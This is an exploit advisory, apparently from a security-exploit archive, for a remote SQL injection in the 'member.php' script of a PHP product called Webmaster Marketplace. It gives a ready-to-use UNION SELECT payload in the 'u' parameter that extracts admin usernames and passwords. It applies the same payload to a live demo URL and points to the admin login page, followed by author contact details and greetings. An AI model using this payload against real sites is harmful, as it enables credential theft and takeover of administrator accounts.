Webmaster Marketplace suffers from a remote SQL injection vulnerability in member.php.
0c0a07b3f53fa0581ee7c2da6b98f6f768276ae0a2d8effa328e88b08c8fdeae
Webmaster Marketplace (member.php u) Remote SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home :IQ-SecuriTY > www.IQ-TY.com | TrYaG > www.TrYaG.cc
Mail : darkangel_G85@yahoo.com
___________________________________
script : http://www.unscripts.com/MPS.html
DorK : :(
exploit :
_______
http://www.site.com/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
Demo :
_______
http://www.unscripts.com/MPS/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
login :
http://www.site.com/Admin/login.php
____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC
|
| My friends : str0ke | DeViL iRaQ | IRAQ_JAGUR | Sakab
|
| FAHD | jiko | IRAQ DiveR | Cyber-Zone | CraCkEr | G4N0K
|_____________________________________________________________________
IM IraQi | IM TrYaGi